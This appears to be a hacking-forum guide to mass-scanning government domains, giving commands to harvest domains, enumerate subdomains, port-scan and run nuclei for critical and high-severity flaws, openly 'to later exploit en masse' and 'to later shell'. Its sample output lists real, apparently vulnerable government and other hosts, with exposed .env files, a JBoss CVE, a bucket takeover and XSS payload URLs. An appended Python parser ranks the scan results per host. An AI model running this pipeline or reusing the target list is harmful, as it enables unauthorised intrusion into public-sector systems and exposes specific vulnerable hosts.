Here we mass subdomain-, port- and vulnerability-scan domains and subdomains for vulnerabilities to later exploit en masse.
Tools:
1. https://github.com/projectdiscovery/subfinder
2. https://github.com/projectdiscovery/naabu
3. https://github.com/projectdiscovery/nuclei
4. https://kaeferjaeger.gay/?dir=sni-ip-ranges
Download domains
You can either scan the internet with zmap, use zgrab to grab the domains, and grep the domains out of that, or visit https://kaeferjaeger.gay/?dir=sni-ip-ranges, download all of the lists and grep the domains yourself. Note that these lists only cover popular cloud providers such as Google, DigitalOcean, Microsoft, Amazon and Oracle.
Grep domains
It's better to concatenate all the *.txt files into one big file and then grep that file for hostnames:
Code:
cd ~/sni_ip_ranges; cat *.txt > phatboi.txt
# one hostname per line, any number of labels (apex domains such as example.gov included), deduplicated
grep -E -o '([a-zA-Z0-9_-]+\.)+[a-zA-Z]{2,}' ~/sni_ip_ranges/phatboi.txt | sort -u > domains.txt
Grep for specific TLDs such as .gov
Filter the domain list down to specific TLDs (there is one domain per line, so the $ anchor matches the end of each domain):
Code:
grep -i '\.gov$' domains.txt > gov_domains.txt
Enumerate subdomains
For a more comprehensive scan, enumerate the subdomains of every domain in the list:
Code:
subfinder -dL gov_domains.txt -silent -o government_domains.txt
Port scan domains
For an even more comprehensive scan, port scan the domains before vuln scanning them; naabu writes host:port pairs, which nuclei accepts directly as input:
Code:
naabu -l government_domains.txt -silent -o government_domains_final.txt
Vulnerability scan hosts file for critical and high severity vulns only
Finally, vuln scan the domains and wait a while. We limit the templates to critical and high severity (-s critical,high) to later shell:
Code:
nuclei -l government_domains_final.txt -s critical,high -silent -o vuln_gov_domains.txt
Sample output:
Code:
[CVE-2017-12149] [http] [critical] https://coc-staging.egovernments.org/invoker/JMXInvokerServlet/
[CVE-2017-12149] [http] [critical] https://coc-staging.egovernments.org/invoker/EJBInvokerServlet/
[CVE-2017-12149] [http] [critical] https://coc-staging.egovernments.org/invoker/readonly
[codeigniter-env] [http] [high] https://bluez1.egovernance.io/.env
[codeigniter-env] [http] [high] https://bluez1.egovernance.io/.env.example
[travis-ci-disclosure] [http] [high] https://bneo.lga.gov.ph/.travis.yml
[travis-ci-disclosure] [http] [high] https://moodle.ebserh.gov.br/.travis.yml
[travis-ci-disclosure] [http] [high] https://neo.lga.gov.ph/.travis.yml
[travis-ci-disclosure] [http] [high] https://old.neo.lga.gov.ph/.travis.yml
[travis-ci-disclosure] [http] [high] https://pma.admin.6sigmagovernance.com/.travis.yml
[aws-bucket-takeover] [http] [high] https://traderemedies.gov.uk [traderemedies.gov.uk]
[codeigniter-env] [http] [high] https://ecidade.saoborja.rs.gov.br/.env
[codeigniter-env] [http] [high] https://ecidade.bage.rs.gov.br/.env.example
[codeigniter-env] [http] [high] https://ecidade.charqueadas.rs.gov.br/.env.example
[codeigniter-env] [http] [high] https://ecidade.campinagrande.pb.gov.br/.env.example
[codeigniter-env] [http] [high] https://ecidade.saoborja.rs.gov.br/.env.example
[top-xss-params] [http] [high] https://blagoveschensk.apteki.me/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
[top-xss-params] [http] [high] https://dev-fdsearch.tax.ohio.gov/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
[top-xss-params] [http] [high] https://fdsearch.tax.ohio.gov/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
[top-xss-params] [http] [high] https://hackerspace.govhack.org/?action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E
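As an added triage helper that is not part of the original post: a Python parser for the nuclei line format shown in the sample output above, grouping findings per host so the hosts needing attention first (highest severity, most distinct templates) surface at the top. The sample lines and the example.gov hostnames are constructed.

```python
import re
from urllib.parse import urlparse

# Matches nuclei's default line format, as in the sample output above:
# [template-id] [protocol] [severity] url [optional extracted value]
NUCLEI_LINE = re.compile(
    r"^\[(?P<template>[^\]]+)\] \[(?P<proto>[^\]]+)\] \[(?P<severity>[^\]]+)\] "
    r"(?P<url>\S+)(?: \[(?P<extra>[^\]]*)\])?$"
)
SEVERITY_RANK = {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}

def parse_line(line):
    """Return one nuclei finding as a dict, or None if the line is not a finding."""
    m = NUCLEI_LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["host"] = urlparse(rec["url"]).hostname or rec["url"]
    return rec

def triage(lines):
    """Group findings per host: worst severity, distinct templates and hit count,
    sorted so the most urgent hosts come first."""
    hosts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # banners, stats and blank lines are not findings
        h = hosts.setdefault(rec["host"], {"max": "info", "templates": set(), "hits": 0})
        h["hits"] += 1
        h["templates"].add(rec["template"])
        if SEVERITY_RANK.get(rec["severity"], -1) > SEVERITY_RANK[h["max"]]:
            h["max"] = rec["severity"]
    return sorted(hosts.items(),
                  key=lambda kv: (SEVERITY_RANK[kv[1]["max"]], len(kv[1]["templates"])),
                  reverse=True)

# Constructed sample output with placeholder hosts (same shape as the real output above).
SAMPLE = """\
[CVE-2017-12149] [http] [critical] https://app.example.gov/invoker/JMXInvokerServlet/
[CVE-2017-12149] [http] [critical] https://app.example.gov/invoker/EJBInvokerServlet/
[codeigniter-env] [http] [high] https://portal.example.gov/.env
[aws-bucket-takeover] [http] [high] https://static.example.gov [static.example.gov]
[tech-detect] [http] [info] https://portal.example.gov
[INF] Using Nuclei Engine (constructed banner line)
""".splitlines()

if __name__ == "__main__":
    for host, info in triage(SAMPLE):
        print(f"{info['max']:<9} {host:<22} hits={info['hits']} {sorted(info['templates'])}")
```

Feed it the real file with `triage(open("vuln_gov_domains.txt"))` to get the same per-host summary.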